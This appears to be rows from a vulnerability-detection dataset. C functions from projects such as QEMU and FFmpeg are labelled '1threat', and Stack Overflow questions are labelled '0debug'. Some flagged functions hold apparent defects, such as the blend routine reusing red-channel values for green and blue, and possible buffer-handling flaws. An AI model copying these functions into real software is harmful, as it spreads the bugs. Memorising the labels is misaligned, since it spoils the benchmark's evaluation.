}
| 1threat
|
static unsigned int dec_btstq(DisasContext *dc)
{
TCGv l0;
dc->op1 = EXTRACT_FIELD(dc->ir, 0, 4);
DIS(fprintf (logfile, "btstq %u, $r%d\n", dc->op1, dc->op2));
cris_cc_mask(dc, CC_MASK_NZ);
l0 = tcg_temp_local_new(TCG_TYPE_TL);
cris_alu(dc, CC_OP_BTST,
l0, cpu_R[dc->op2], tcg_const_tl(dc->op1), 4);
cris_update_cc_op(dc, CC_OP_FLAGS, 4);
t_gen_mov_preg_TN(dc, PR_CCS, l0);
dc->flags_uptodate = 1;
tcg_temp_free(l0);
return 2;
}
| 1threat
|
Split a string in C# : <p>I have a string contains text "<strong>AA55BB10CC1DD10E123</strong>". I have to split the string and place it in List as text / value field like </p>
<p>AA | 55</p>
<p>BB | 10</p>
<p>CC | 1</p>
<p>DD | 10</p>
<p>E | 123</p>
<p>Thanks</p>
| 0debug
|
Jenkins Pipeline docker.build() gives error '"docker build" requires exactly 1 argument(s)' : <p>With this minimal Jenkins Pipeline script</p>
<pre><code>node {
docker.build("foo", "--build-arg x=y")
}
</code></pre>
<p>I'm getting a confusing error</p>
<blockquote>
<p>"docker build" requires exactly 1 argument(s).</p>
</blockquote>
<p>But as per the documentation, the signature of <code>docker.build()</code> is <code>build(image[, args])</code> (from Jenkins <code>/job/dockerbug/pipeline-syntax/globals#docker</code>)</p>
<blockquote>
<p><code>build(image[, args])</code></p>
<p>Runs docker build to create and tag the specified
image from a Dockerfile in the current directory. Additional args may
be added, such as <code>'-f Dockerfile.other --pull --build-arg
http_proxy=http://192.168.1.1:3128 .'</code>. Like docker build, args must
end with the build context. Returns the resulting Image object.
Records a FROM fingerprint in the build.</p>
</blockquote>
<p>What's going on?</p>
| 0debug
|
static inline void RENAME(yuv2yuv1)(int16_t *lumSrc, int16_t *chrSrc,
uint8_t *dest, uint8_t *uDest, uint8_t *vDest, long dstW, long chrDstW)
{
#ifdef HAVE_MMX
if (uDest)
{
asm volatile(
YSCALEYUV2YV121
:: "r" (chrSrc + chrDstW), "r" (uDest + chrDstW),
"g" (-chrDstW)
: "%"REG_a
);
asm volatile(
YSCALEYUV2YV121
:: "r" (chrSrc + 2048 + chrDstW), "r" (vDest + chrDstW),
"g" (-chrDstW)
: "%"REG_a
);
}
asm volatile(
YSCALEYUV2YV121
:: "r" (lumSrc + dstW), "r" (dest + dstW),
"g" (-dstW)
: "%"REG_a
);
#else
int i;
for (i=0; i<dstW; i++)
{
int val= lumSrc[i]>>7;
if (val&256){
if (val<0) val=0;
else val=255;
}
dest[i]= val;
}
if (uDest)
for (i=0; i<chrDstW; i++)
{
int u=chrSrc[i]>>7;
int v=chrSrc[i + 2048]>>7;
if ((u|v)&256){
if (u<0) u=0;
else if (u>255) u=255;
if (v<0) v=0;
else if (v>255) v=255;
}
uDest[i]= u;
vDest[i]= v;
}
#endif
}
| 1threat
|
static av_always_inline void blend_image_packed_rgb(AVFilterContext *ctx,
AVFrame *dst, const AVFrame *src,
int main_has_alpha, int x, int y,
int is_straight)
{
OverlayContext *s = ctx->priv;
int i, imax, j, jmax;
const int src_w = src->width;
const int src_h = src->height;
const int dst_w = dst->width;
const int dst_h = dst->height;
uint8_t alpha;
const int dr = s->main_rgba_map[R];
const int dg = s->main_rgba_map[G];
const int db = s->main_rgba_map[B];
const int da = s->main_rgba_map[A];
const int dstep = s->main_pix_step[0];
const int sr = s->overlay_rgba_map[R];
const int sg = s->overlay_rgba_map[G];
const int sb = s->overlay_rgba_map[B];
const int sa = s->overlay_rgba_map[A];
const int sstep = s->overlay_pix_step[0];
uint8_t *S, *sp, *d, *dp;
i = FFMAX(-y, 0);
sp = src->data[0] + i * src->linesize[0];
dp = dst->data[0] + (y+i) * dst->linesize[0];
for (imax = FFMIN(-y + dst_h, src_h); i < imax; i++) {
j = FFMAX(-x, 0);
S = sp + j * sstep;
d = dp + (x+j) * dstep;
for (jmax = FFMIN(-x + dst_w, src_w); j < jmax; j++) {
alpha = S[sa];
if (main_has_alpha && alpha != 0 && alpha != 255) {
uint8_t alpha_d = d[da];
alpha = UNPREMULTIPLY_ALPHA(alpha, alpha_d);
}
switch (alpha) {
case 0:
break;
case 255:
d[dr] = S[sr];
d[dg] = S[sg];
d[db] = S[sb];
break;
default:
d[dr] = is_straight ? FAST_DIV255(d[dr] * (255 - alpha) + S[sr] * alpha) : FAST_DIV255(d[dr] * (255 - alpha) + S[sr]);
d[dg] = is_straight ? FAST_DIV255(d[dg] * (255 - alpha) + S[sg] * alpha) : FAST_DIV255(d[dr] * (255 - alpha) + S[sr]);
d[db] = is_straight ? FAST_DIV255(d[db] * (255 - alpha) + S[sb] * alpha) : FAST_DIV255(d[dr] * (255 - alpha) + S[sr]);
}
if (main_has_alpha) {
switch (alpha) {
case 0:
break;
case 255:
d[da] = S[sa];
break;
default:
d[da] += FAST_DIV255((255 - d[da]) * S[sa]);
}
}
d += dstep;
S += sstep;
}
dp += dst->linesize[0];
sp += src->linesize[0];
}
}
| 1threat
|
create table empty : <p>How can you create an empty table from an existing table?</p>
| 0debug
|
How to debounce user input in reactjs using rxjs : <p>My problem may be a trivial one but I wasn't able to find the answer so far. </p>
<p>How can I defer (debounce) updating state in React while user is typing, to avoid unnecessary updates?</p>
<p>Having <code><input onChange={this.onChange} .../></code>, how can I bind onChange event with rxjs? Should I try to make this input observable or should I use FromEventPattern?</p>
<p>In both cases I have no idea how to bind React events with rxjs.
The second question is whether the user will see any input changes during debounce?</p>
| 0debug
|
ladder-like C++ virtual inheritance : <p>If I have a class inheritance relation like the following</p>
<pre><code> a
/ \
b c
\ |
| d
\/ \
e f
\ /
g
</code></pre>
<p>Is the following the correct definition?</p>
<pre><code> class A {};
class B: public virtual A {};
class C: public virtual A {};
class D: public C {};
class E: public B, public virtual D {};
class F: public virtual D {};
class G: public E, public F {};
</code></pre>
<p>I made both A and D virtually inherited because I assume each joint class need to be virtual.</p>
<p>Also I am not sure how C++ defines the constructor order of the above case. The link
<a href="https://isocpp.org/wiki/faq/multiple-inheritance#mi-vi-ctor-order" rel="noreferrer">https://isocpp.org/wiki/faq/multiple-inheritance#mi-vi-ctor-order</a> says</p>
<blockquote>
<p>The very first constructors to be executed are the virtual base
classes anywhere in the hierarchy. They are executed in the order they
appear in a depth-first left-to-right traversal of the graph of base
classes, where left to right refer to the order of appearance of base
class names.</p>
<p>After all virtual base class constructors are finished, the
construction order is generally from base class to derived class. The
details are easiest to understand if you imagine that the very first
thing the compiler does in the derived class’s ctor is to make a
hidden call to the ctors of its non-virtual base classes (hint: that’s
the way many compilers actually do it). So if class D inherits
multiply from B1 and B2, the constructor for B1 executes first, then
the constructor for B2, then the constructor for D. This rule is
applied recursively; for example, if B1 inherits from B1a and B1b, and
B2 inherits from B2a and B2b, then the final order is B1a, B1b, B1,
B2a, B2b, B2, D.</p>
<p>Note that the order B1 and then B2 (or B1a then B1b) is determined by
the order that the base classes appear in the declaration of the
class, not in the order that the initializer appears in the derived
class’s initialization list.</p>
</blockquote>
<p>If so, is the order like?</p>
<pre><code> A, D, B, C, D, F, G
</code></pre>
<p>I do not expect D is constructed before C. What is the correct constructor order?</p>
| 0debug
|
void timerlist_notify(QEMUTimerList *timer_list)
{
if (timer_list->notify_cb) {
timer_list->notify_cb(timer_list->notify_opaque);
} else {
qemu_notify_event();
}
}
| 1threat
|
IE8 - media query is not rendering : <p>I've got very curious case in IE8 where media query is not working on URL (mobile view shows on desktop) but If I use IP address than it works (desktop view shows). I tried a whole lot of things even several solutions from stackoverflow but couldn't succeed. It seems like respond.js issue but I'm not sure. Can anyone please help me on this. </p>
<p>URL: <a href="https://www.uhc.com/" rel="nofollow">https://www.uhc.com/</a></p>
<p>IP: 149.111.148.170</p>
<p>FYI: I'm using IE 11 developer Tool to check it on IE8.</p>
| 0debug
|
Coding a function in python wihch count the number of occurances : <p>I am a beginner in python and I wish coding a function having a variable number of parameters. This function must count the number of occurance of each character existing in all input strings.
let's rename this function as carCompt.</p>
<p>For example :</p>
<pre><code>carCompt("Sophia","Raphael","Alexandre")
</code></pre>
<p>the result should be:</p>
<pre><code>{'A':5,
'D':1,
'E':3,
'H':2,
'L':1,
'N':1,
'O':1,
'P':2,
'R':2,
'S':1,
'X':1}
</code></pre>
<p>thank you for help!!</p>
| 0debug
|
Comparing integer and string without coverting in vb : I comparing integer and string in vb.
Please check the following code:<br/> <br/> <code>Dim strPrice as String = "9" <br/> If CInt(Int(txtPrice.Text)) < strPrice Then <br/> <pre> return false <br/> End If </code> <br/> <br/> Is it possible to compare without converting both of them to integer?
| 0debug
|
Java - number in expanded form : <p>I have given number and want it to return as a String in expanded form. For example</p>
<pre><code>expandedForm(12); # Should return "10 + 2"
expandedForm(42); # Should return "40 + 2"
expandedForm(70304); # Should return "70000 + 300 + 4"
</code></pre>
<p>My function works for first and second case, but with 70304 it gives this: </p>
<pre><code>70 + 00 + 300 + 000 + 4
</code></pre>
<p>Here's my code</p>
<pre><code>import java.util.Arrays;
public static String expandedForm(int num)
{
String[] str = Integer.toString(num).split("");
String result = "";
for(int i = 0; i < str.length-1; i++) {
if(Integer.valueOf(str[i]) > 0) {
for(int j = i; j < str.length-1; j++) {
str[j] += '0';
}
}
}
result = Arrays.toString(str);
result = result.substring(1, result.length()-1).replace(",", " +");
System.out.println(result);
return result;
}
</code></pre>
<p>I think there's a problem with the second loop, but can't figure out why.</p>
| 0debug
|
static void usage(const char *name)
{
(printf) (
"Usage: %s [OPTIONS] FILE\n"
"QEMU Disk Network Block Device Server\n"
"\n"
" -h, --help display this help and exit\n"
" -V, --version output version information and exit\n"
"\n"
"Connection properties:\n"
" -p, --port=PORT port to listen on (default `%d')\n"
" -b, --bind=IFACE interface to bind to (default `0.0.0.0')\n"
" -k, --socket=PATH path to the unix socket\n"
" (default '"SOCKET_PATH"')\n"
" -e, --shared=NUM device can be shared by NUM clients (default '1')\n"
" -t, --persistent don't exit on the last connection\n"
" -v, --verbose display extra debugging information\n"
"\n"
"Exposing part of the image:\n"
" -o, --offset=OFFSET offset into the image\n"
" -P, --partition=NUM only expose partition NUM\n"
"\n"
#ifdef __linux__
"Kernel NBD client support:\n"
" -c, --connect=DEV connect FILE to the local NBD device DEV\n"
" -d, --disconnect disconnect the specified device\n"
"\n"
#endif
"\n"
"Block device options:\n"
" -f, --format=FORMAT set image format (raw, qcow2, ...)\n"
" -r, --read-only export read-only\n"
" -s, --snapshot use FILE as an external snapshot, create a temporary\n"
" file with backing_file=FILE, redirect the write to\n"
" the temporary one\n"
" -l, --load-snapshot=SNAPSHOT_PARAM\n"
" load an internal snapshot inside FILE and export it\n"
" as an read-only device, SNAPSHOT_PARAM format is\n"
" 'snapshot.id=[ID],snapshot.name=[NAME]', or\n"
" '[ID_OR_NAME]'\n"
" -n, --nocache disable host cache\n"
" --cache=MODE set cache mode (none, writeback, ...)\n"
#ifdef CONFIG_LINUX_AIO
" --aio=MODE set AIO mode (native or threads)\n"
#endif
" --discard=MODE set discard mode (ignore, unmap)\n"
" --detect-zeroes=MODE set detect-zeroes mode (off, on, unmap)\n"
"\n"
"Report bugs to <[email protected]>\n"
, name, NBD_DEFAULT_PORT, "DEVICE");
}
| 1threat
|
static SchroBuffer *find_next_parse_unit(SchroParseUnitContext *parse_ctx)
{
SchroBuffer *enc_buf = NULL;
int next_pu_offset = 0;
unsigned char *in_buf;
if (parse_ctx->buf_size < 13 ||
parse_ctx->buf[0] != 'B' ||
parse_ctx->buf[1] != 'B' ||
parse_ctx->buf[2] != 'C' ||
parse_ctx->buf[3] != 'D')
return NULL;
next_pu_offset = (parse_ctx->buf[5] << 24) +
(parse_ctx->buf[6] << 16) +
(parse_ctx->buf[7] << 8) +
parse_ctx->buf[8];
if (next_pu_offset == 0 &&
SCHRO_PARSE_CODE_IS_END_OF_SEQUENCE(parse_ctx->buf[4]))
next_pu_offset = 13;
if (next_pu_offset <= 0 || parse_ctx->buf_size < next_pu_offset)
return NULL;
in_buf = av_malloc(next_pu_offset);
if (!in_buf) {
av_log(parse_ctx, AV_LOG_ERROR, "Unable to allocate input buffer\n");
return NULL;
}
memcpy(in_buf, parse_ctx->buf, next_pu_offset);
enc_buf = schro_buffer_new_with_data(in_buf, next_pu_offset);
enc_buf->free = libschroedinger_decode_buffer_free;
enc_buf->priv = in_buf;
parse_ctx->buf += next_pu_offset;
parse_ctx->buf_size -= next_pu_offset;
return enc_buf;
}
| 1threat
|
SQL SQL query ssrs report : I have
period balance
1 100
1 200
2 300
2 400
3 400
3 500
i need to show in SSRS report like below
I like to calculate sum if max period as column maxsum
then sum based on second max which is 2
3 2 1
900 700 300
thanks
| 0debug
|
How to make YouTube and Vimeo Videos Responsive? : <p>I want to make embedded video from youtube and vimeo responsive.</p>
| 0debug
|
bool cpu_physical_memory_is_io(target_phys_addr_t phys_addr)
{
MemoryRegionSection *section;
section = phys_page_find(phys_addr >> TARGET_PAGE_BITS);
return !(memory_region_is_ram(section->mr) ||
memory_region_is_romd(section->mr));
}
| 1threat
|
Sparql query for SQL query : What will be the Sparql query for
Select empname from mytable
Where empid=1;
| 0debug
|
What does using a shift operator(<<) before a variable implies in C? : <p>I read a code to convert a number to its binary equivalent, where the following statement was used:</p>
<pre><code>1<<j
</code></pre>
<p>What is the use of such a statement?</p>
| 0debug
|
increament for loop by date php : I am trying to increament date by new date. but it is not showing any result.
$ed = strtotime($endDate);
for($i = $ed; $i <= strtotime($today); $i = $ed ){
$toArray['d'] = $ed;
$startDate = date('y-m-d', strtotime("+1 day", strtotime($endDate)));
$endDate = date('y-m-d', strtotime("+13 day", strtotime($startDate)));
$ed = strtotime($endDate);
}
it is not working . whats wrong..?
| 0debug
|
build_rsdp(GArray *rsdp_table, GArray *linker, unsigned rsdt)
{
AcpiRsdpDescriptor *rsdp = acpi_data_push(rsdp_table, sizeof *rsdp);
bios_linker_loader_alloc(linker, ACPI_BUILD_RSDP_FILE, 16,
true );
memcpy(&rsdp->signature, "RSD PTR ", sizeof(rsdp->signature));
memcpy(rsdp->oem_id, ACPI_BUILD_APPNAME6, sizeof(rsdp->oem_id));
rsdp->length = cpu_to_le32(sizeof(*rsdp));
rsdp->revision = 0x02;
rsdp->rsdt_physical_address = cpu_to_le32(rsdt);
bios_linker_loader_add_pointer(linker, ACPI_BUILD_RSDP_FILE,
ACPI_BUILD_TABLE_FILE,
rsdp_table, &rsdp->rsdt_physical_address,
sizeof rsdp->rsdt_physical_address);
rsdp->checksum = 0;
bios_linker_loader_add_checksum(linker, ACPI_BUILD_RSDP_FILE,
rsdp, rsdp, sizeof *rsdp, &rsdp->checksum);
return rsdp_table;
}
| 1threat
|
int cmdutils_read_file(const char *filename, char **bufptr, size_t *size)
{
int ret;
FILE *f = fopen(filename, "rb");
if (!f) {
av_log(NULL, AV_LOG_ERROR, "Cannot read file '%s': %s\n", filename,
strerror(errno));
return AVERROR(errno);
}
fseek(f, 0, SEEK_END);
*size = ftell(f);
fseek(f, 0, SEEK_SET);
*bufptr = av_malloc(*size + 1);
if (!*bufptr) {
av_log(NULL, AV_LOG_ERROR, "Could not allocate file buffer\n");
fclose(f);
return AVERROR(ENOMEM);
}
ret = fread(*bufptr, 1, *size, f);
if (ret < *size) {
av_free(*bufptr);
if (ferror(f)) {
av_log(NULL, AV_LOG_ERROR, "Error while reading file '%s': %s\n",
filename, strerror(errno));
ret = AVERROR(errno);
} else
ret = AVERROR_EOF;
} else {
ret = 0;
(*bufptr)[(*size)++] = '\0';
}
fclose(f);
return ret;
}
| 1threat
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.